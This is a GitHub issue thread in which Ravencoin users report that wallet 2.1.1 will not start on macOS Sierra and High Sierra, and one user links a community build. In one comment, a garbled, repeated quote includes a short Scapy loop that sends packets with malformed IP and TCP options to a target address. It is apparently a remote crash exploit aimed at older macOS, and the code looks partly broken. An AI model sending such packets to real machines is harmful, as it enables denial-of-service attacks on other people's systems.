### ISSUE TITLE
Wallet 2.1.1 cannot install/start on macOS High Sierra

### ISSUE THREAD

**Issue by ganzocrypt** [RavenProject/Ravencoin#404]
I cannot start RVN core wallet on my High Sierra mac, I get the following message:
"You have macOS 10.12.6. The application requires macOS 10.13 or later."

Can you please build a version that is also good to install for older macOS versions before the 31st ?
Thx

**Comment by lonelyminer** [comment]
There is  a similar  issue with  2.1.0. , 
did someone from Devs team actually test RVN gui  on Macs before it is  realised, because neither of new version works?  Can we use 2.0.4 after 31.10 ?

**Comment by ganzocrypt** [comment]
I posted since they release the new version but same issue, the build for mac does not include older versions macOS. This is annoying since is not the only project that does this, there should be a test pla/QA before posting builds. There are plenty of people willing to help. Hopefully they release a new wallet that can be install on all macOS before 31/10 as you mention.

**Comment by carlzimmerman** [comment]
Version  v2.1.1.0 worked on MacOS for me on High Sierra

**Comment by charona** [comment]
I'm on Sierra and cannot upgrade the OS. I doubt that RVN uses some specific features of the latest MacOC, so it's probably just a flag they have to set before compiling, to let it run on earlier OS version. Please do so if possible- Thanks.

**Comment by fokep** [comment]
> Leave my buffers alone!

All ur buffer are belong to the guy she told you not to worry about

**Comment by lonelyminer** [comment]
> I don't think anyone should be on Sierra or High Sierra anymore...
> 
> ```
> IP = 'xxx.xxx.xxx.xxx'
> port = 2323
> for i in range(8,40):
>     send(IP(dst={0},options=[IPOption('A'*i)])/TCP(dport={1},options=[(19,'1'*18),(19,'2'*18)])).format(IP, port)
> ```



> I don't think anyone should be on Sierra or High Sierra anymore...
> 
> ```
> IP = 'xxx.xxx.xxx.xxx'
> port = 2323





> I don't think anyone should be on Sierra or High Sierra anymore...
> 
> ```
> IP = 'xxx.xxx.xxx.xxx'
> port = 2323
> for i in range(8,40):
>   ( don't think anyone should be on Sierra or High Sierra anymore...)
> ```
I don't think anyone should upgrade OSX  if everything (except RVN core)  works  on Mac.

**Comment by bedri** [comment]
I really wonder about what does buffers do in real life :)
Jokes aside MacOS systems needs a solution about wallets. There are technical difficulties for sure and unofficial solutions are not the ideal case but we should stabilize that. There are too many Mac users out there who are free to use whatever version they want and we should give them a solution that suits all. It's hard to do but there must be a solution.

**Comment by underdarkskies** [comment]
https://github.com/underdarkskies/Ravencoin/releases/tag/v2.1.1  What is official anyways?...... I simply compiled the binaries according to my specs, which are now a part of the Core repository. :) And it should support all macOS;s
